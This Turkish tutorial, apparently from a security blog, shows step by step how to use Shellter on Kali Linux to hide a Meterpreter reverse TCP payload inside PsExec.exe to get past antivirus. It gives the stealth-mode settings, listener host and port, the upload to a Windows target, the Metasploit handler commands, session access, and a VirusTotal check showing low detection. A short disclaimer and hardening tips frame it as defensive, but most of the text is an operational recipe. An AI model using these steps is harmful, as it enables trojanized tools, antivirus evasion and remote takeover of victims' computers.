Bu makale, kullanmakta olduğunuz sistemleri (Server/Client) güncel tutmanız ve security hardening yapmanız için yayınlanmıştır. Sistemleriniz de güvenlik açığı olduğu zaman aşağıdaki işlemler yapılabilmektedir.
Bu bilgileri yasa dışı bir faaliyet amacıyla kullanmayınız.
Kali Linux Shelter’da hazırlanacak olan zararlı ile anti virüs yazılımlarının bypass edilmesi amacıyla işletim sistemlerin de çalışan bir dosyanın içerisine gizli kod eklemek amacıyla kullanılır.
Öncelikle, shellter.exe dosyasını Kali Linux’e download edip (Zip’i extract ederek), kurulumunu yapıyoruz.
Download link: https://www.shellterproject.com/download/

Ls -la komutu ile shelter.exe nin mevcut security permissionlerını görüntülüyorum.
Chmod 744 ile gerekli yetkileri düzenliyorum.
Chmod 744 yetkileri aşağıdaki gibidir.

Ls -la komutu ile shelter.exe nin yetkileri verdikten sonra tekrar security permissionlerını görüntülüyorum.

Shelter uygulamasını kullanabilmek için WINE application’I yüklemek gerekmektedir.
WINE: Linux işletim systemin de Windows uygulamaarının çalıştırılmasını sağlayan bir katmandır.
Komut:
Dpkg –add-architecture i386 && apt-get upfate && apt-get install wine32

“Wine Shellter.exe” komutunu çalıştırıyorum.

Zararlı’yı Psexe.exe tool’una gizleyeceğim.
PE Target: PsExec.exe

Stealth Modu Y ile enable hale getiriyorum.

Reverse Shell sağlanması için gerekli bilglieri “L” yi seçerek gireceğim
- Ile Meterpreter_reverse_tcp ‘yi seçiyorum.
- Lhost: 1.1.1.3
- Lport: 443





Injection işlemleri sorunsuz olarak tamamlandı.
Hazırlamış olduğumuz zararlı psexec.exe dosyası çeşitli yöntemler ile hedef bilgisayara iletilir ve çalışması beklenir.
Not: ben Zararlı dosyayı Kali’de upload komutu nu kullanarak göndereceğim. Diğer makalelerimiz de detaylı olarak nasıl yapıldığı anlatılmıştır.
https://volkandemirci.org/2020/04/17/kali-metasploit-ile-dosya-download-ve-upload/


Psexec.exe dosyasını Windows’a upload komutunu kullanarak aşağıdaki gibi gönderiyorum.

Windows’dan kontrol ediyorum ve dosyanın Windows’a iletildiğini görüyorum.

Kali’de handler’i çalıştırıyorum. (Dinleme modu’na geçiyorum)

Show options komutu ile kontrol ediyorum.

Exploit -j -z çalıştırarak dinlemeye başlıyorum.

Windows’da psexec.exe dosyasını çalıştırıyorum.


Aşağıdaki komutları kullanarak session’ı başlatıyorum ve hedef makinaya erişebilirliğimi kontrol ediyorum.
Sessions
Sessions -I 2
sysinfo

www.virustotal.com ile hazırlamış olduğum zararlı’yı kontrol ediyorum ve 71 anti virus yazılımından sadece 24 adeti tespit edebildi. Yine de çok büyük oranda AV yazılımları zararlı’yı tespit edemedi.


———————————————————————————————————————————————
N O T: Kesinlikle bilgisayarlarımızı güncel tutmalıyız, Windows güncellemelerini zamanın da ve tam olarak yapmalıyız . Ayrıca bilgisayarımız da bulunan tüm uygulamalarında güncellemelerini yapmalıyız.
———————————————————————————————————————————————
- ATA yada Azure ATP kullanınız.
- PAW (high secure workstation) kullanınız.
- Anti virüs + EDR + Malware Detection kullanınız.
- Aduit Log’ların doğru konfigüre edildiğinden ve aktif olduğundan emin olunuz.
———————————————————————————————————————————————